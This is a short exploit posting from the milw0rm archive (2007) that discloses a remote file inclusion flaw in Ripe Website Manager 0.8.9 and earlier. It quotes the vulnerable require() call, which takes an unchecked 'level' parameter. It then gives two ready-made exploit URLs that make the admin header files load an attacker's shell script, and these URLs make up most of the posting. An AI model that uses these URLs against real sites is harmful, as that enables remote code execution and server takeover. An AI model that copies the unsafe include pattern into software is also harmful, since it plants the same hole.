Ripe Website Manager (CMS) <= 0.8.9 - Remote File Inclusion Vulns

#Author:: BlackNDoor | blackndoor@learntohell.net #Homepage:: www.learntohell.net # #Script:: Ripe Wepsite Manager #Version:: &#60;= v0.8.9 #Type:: Remote File Include # #Source:: http://sourceforge.net/project/showfiles.php?group_id=194532 #Bug:: -&#62; Files: /admin/includes/author_panel_header.php /admin/includes/admin_header.php -&#62; vulncode: &#60;?php ... define(&#34;LEVEL&#34;, $level); // directory level // includes require(LEVEL.&#39;../includes/config.php&#39;); ... ?&#62; #Exploit:: http://www.site.com/[path to ripe]/admin/includes/author_panel_header.php?level=shell.txt? http://www.site.com/[path to ripe]/admin/includes/admin_header.php?level=shell.txt? #thanks:: str0ke # milw0rm.com [2007-06-30]